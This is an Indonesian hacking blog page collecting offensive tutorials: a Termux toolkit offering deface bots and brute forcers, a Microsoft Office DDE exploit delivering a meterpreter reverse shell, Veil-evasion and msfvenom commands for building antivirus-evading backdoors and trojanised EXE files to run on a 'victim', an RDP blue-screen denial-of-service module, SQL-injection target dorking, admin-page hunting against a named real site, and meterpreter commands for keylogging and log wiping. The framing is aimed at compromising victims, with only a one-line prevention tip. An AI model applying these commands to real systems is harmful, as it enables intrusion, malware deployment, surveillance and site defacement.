Termux ID: PENTEST -->

    Social Items

Home / PENTEST
hay guys :v cie berjumpa lagi sama cakil :v
cakil kali ini akan share tools pentester :v kali aja berguna buat kalian
langsung ae guys :v

Realease : kamis.07 Desember
author : Mr.cakil
thanks to : 4wsec - Mr.Tenwap
fiture ?
 01) Red Hawk
 02) D-Tect
 03) Hunner
 04) WPScan
 05) Webdav
 06) Metasploit
 07) Kali Nethunter
 08) Ubuntu
 09) Youtube Dl
 10) viSQL
 11) Weeman
 12) WFDroid
 13) FBBrute
 14) Ngrok
 15) Torshammer
 16) RouterSploit
 17) Hydra
 18) Weevely
 19) SQLMap
 20) Dirbuster
 21) admin finder
 22) lokomedia exploiter
 23) elfinder exploiter
 24) magento add admin exploiter
 25) scanner tools
 26) bing dorker
 27) katoolin
 28) arch linux
 29) linux fedora
 30) hash-buster
 31) sudo
 32) aircrack-ng
 33) joomscan
 34) bing-ip2hosts
 35) BlueMaho
 36) Bluepot
 37) honeypot
 38) bot auto deface 1
 39) bot auto deface 2
 40) mailer sender cli
 41) Wordpress Brute Force
 42) Oh-myzsh theme for termux
 43) instabot (instagram bot)
 44) exit

 berikut tampilan nya
nah gud kan :v
oh iya disitu ada 2 paket ya
tools (itu buat termux)
kalo yang tools2 (all linux) gnuroot ? insya allah

tester : termux/ ubuntu 17.10 / kali linux
langsung ae nih link nya bree
sini bang :v
cara menjalan kan nya cukup
chmod 777 tools
./tools
(termux)
or
chmod 777 tools2
./tools2
(all linux)
kritik or saran monggo :)

Release Tools Pentester Mrcakil v2.1



Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

Langkah-langkah

  • -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
  • -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/
  • -         Jalankan Metasploit
  • -         Jalankan perintah 

use exploits/windows/dde_delivery

  • -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

  • -         Jalankan exploit
  • -         Copy script yang muncul pada module dan buka VirtualMachine kalian
  • -         Buka Microsoft Word
  • -         Klik tab Insert > Quick Parts > Fields > Ok


  •  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

  • -         Ganti dengan script yang kita dapat dari module


  • -         Save !
  • -         Buka file doc yang telah kita simpan tadi.
  • -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar


  • -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!


Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.


Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.



Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
    4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  4. atau command di bawah ini (untuk 64 bit atau x64)
    5. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  5. Isi LHOST dengan IP agan masing"
  6. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  7. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  8. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  9. Ingat LHOST dan LPORT isi punya agan sendiri :D
  10. Nah lalu pindah tuh ke PC korban :D
  11. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  12. Selamat Mengeksploitasi PC korban :v

Menyisipkan Backdoor ke File EXE

BSOD Attack Pada Windows Dengan Metasploit


BSOD Attack

BSOD (Bluescreen of death), kalian pasti pada tahu apa itu bluescreen, bluescreen biasanya terjadi karna adanya gangguan pada sistem operasi atau harddisk yg kita pakai, namun Bluescreen yg akan kita bahas ini terjadi karena serangan DOS menggunakan tool METASPLOIT, berikut tutorialnya :

Syarat :
- korban menggunakan windows 7
- satu jaringan
- korban sudah mengaktifkan "allow remote desktop".

BACA JUGA :
Cara menemukan celah disuatu website 
Perintah Meterpreter Metasploit 


1. Buka metasploit console anda
2. lalu ketikkan :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Target saya memiliki ip 192.168.43.93 , silahkan sobat sesuaikan dengan ip target sobat, lalu ketik seperti berikut :
set RHOST 192.168.43.93

4. Nah setelah memasukan IP target, tinggal kita exploit, dengan mengetikkan perintah :
exploit

5. Jika berhasil, akan ditunjukkan dengan peringatan :
[+] 192.168.43.93:3389 - 192.168.43.93:3389 seems down
6. Windows pun akan bluescreen, ada juga yg langsung mati lalu melakukan restart secara paksa.

Bila kurang jelas, berikut ada videonya :


BSOD Attack Pada Windows Dengan Metasploit


        Hello Beb , Kuy ,Gan ,Om  , Tante Sekalian Udh Lama Gk Posting Di Karnakan Sibuk Di Dunyat (Dunia Nyata). Ini Artikel Saya Yg Kedua,, Jarang Post Yahh :'v Ya Iyalah Ente kira gampang buat nyari bahan buat di post,di tambah lagi urusan tentang ceuek , Hey Kamu Apa Kabar #Nf wkwkwk Jadi Curhat :v Halah Gk Ush Ngebacot Lagi Langsung Aja Masuk Ke Tutorial Kali Ini Cara Menemukan Celah Website Dg SQL Poizon.
              Setelah kita mengetahui cara melakukan sqlinjection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakansql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini 

Step 1: Download SQL Poizon Software
Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.


Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”





Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.



Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln 




Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan toolhavij untuk SQLi

Oke deh sekian dulu tutorial
kalau masih ada yg kurang jelas atau mau belajar seputar hacking  PM saja fb saya 
Di Sini

btw makasih buat Habil Zeus Udh Ngizinin Post Postingan yg sama hehehe.


Cara Menemukan Cela Website Dengan SQL Poizon

Perintah atau Command Meterpreter Session Metasploit

Metasploit

Perintah atau Command Meterpreter Session Metasploit,
Metasploit.. metasploit bagi saya adalah tool yg paling canggih yg pernah saya temui, mengapa ? karena tool metasploit ini memiliki berbagai jenis exploit, modul, dan pastinya pengexploitasiannya yg multiplatform.

Salah satu yg sering dipakai pada tahun2 sekarang adalah pengexploitan terhadap windows dan juga android dengan menggunakan msfvenom, jika dalam istilah hacking, jenis serangan ini dinamakan REMOTE ATTACK.

Tutor Remote Attack :
Hack Windows beda jaringan dengan Metasploit
Hack Windows Mengganakan Pentagon 

Berbicara soal metasploit, tidak lepas dari yg namanya Meterpreter , yha session meterpreterlah yg paling diinginkan oleh para user metasploit yg melakukan exploitasi dengan metasploit. Dan pada post ini saya akan membahas mengenai "Perintah atau Command Meterpreter Session Metasploit".

Meterpreter


Perintah Inti:

  • ? - Untuk menampilkan menu bantuan
  • background - Untuk keluar sementara dari sesi yg kita buka
  • bgkill - Untuk coly, artiin sendirilah, pasti ngerti :v, bg = background
  • bglist - Untuk menampilkan background list yg masih berjalan
  • bgrun - Artiin sendiri ea :v
  • exit - Keluar dari meterpreter
  • help - Sama seperti perintah "?"
  • run - lari :v , pasti taulah
  • dll masih ada beberapa lagi, males gw :| 

Perintah File Yang Ada Di System Korban(Windows)
  • cat - Sama seperti Linux, membaca dan menampilkan isi kontent suatu file
  • cd - Ini pasti pada tahu, untuk move ke directory lain
  • del - Delete sesuatu pastinya :)
  • download - Untuk mendownload sesuatu yg ada di storage korban
  • edit - Yha untuk mengedit, tp menggunakan editor vim 
  • getlwd - Menampilkan direktori lokal sistem
  • lcd - Ubah direktori local
  • ls - Menampilkan list file, folder di direktori yg telah kita masuki
  • mkdir - Alias makedir, yaitu membuat sebuah direktori/folder
  • rm - Yaitu remove atau mendelete sesuatu
  • upload - Untuk upload sesuatu ke storage korban dari storage kita
  • Dll :v 
 Perintah Network
  • ipconfig - Yg ini wajib tahu lah
  • portfwd - Port forward pada sistem korban
  • route - Lihat atau modifikasi routing table korban
 Perintah System pada Korban
  • clearav - menghapus log siapa saja yg pernah login ke system korban
  • execute - perintah untuk mengeksekusi file diwindows melalu meterpreter
  • getpid - mengambil Proses ID pada windows (PID)
  • getprivs - mendapatkan hak akses apapun
  • getuid - mengambil info pengguna berjalan sebagai akses apa
  • kill - bunuh :v , pikirin lah
  • ps - melihat proses yg berjalan
  • reboot - reboot pc korban
  • reg - interaksi dengan registry korban
  • shell -istilahnya membuka cmd korban
  • shutdown - shuts down komputer korban
  • sysinfo - menampilkan info sistem device korban, misal OS
Perintah User Intefaces
  • enumdesktops - Menampilkan list desktop yg dapat diakses
  • getdesktop - Menyusup ke Desktop korban
  • idletime - Mengecek waktu Idle korban
  • keyscan_dump - Dump dari keylogger yg kita start
  • keyscan_start - Menjalankan keylogger pada korban
  • keyscan_stop - Menghentikan keylogger yg kita start
  • screenshot - Mengambil screenshot desktop korban
  • set_desktop - Mengganti desktop meterpreter
  • Dll

Mungkin segitu saja yg gw bahas, nanti kalian tinggal ketik salah satu perintah diatas, lalu tekan TAB, nanti akan muncul pilihan perintah lanjutannya :)
Thx

Perintah atau Command Meterpreter Session Metasploit

Subscribe to: Posts (Atom)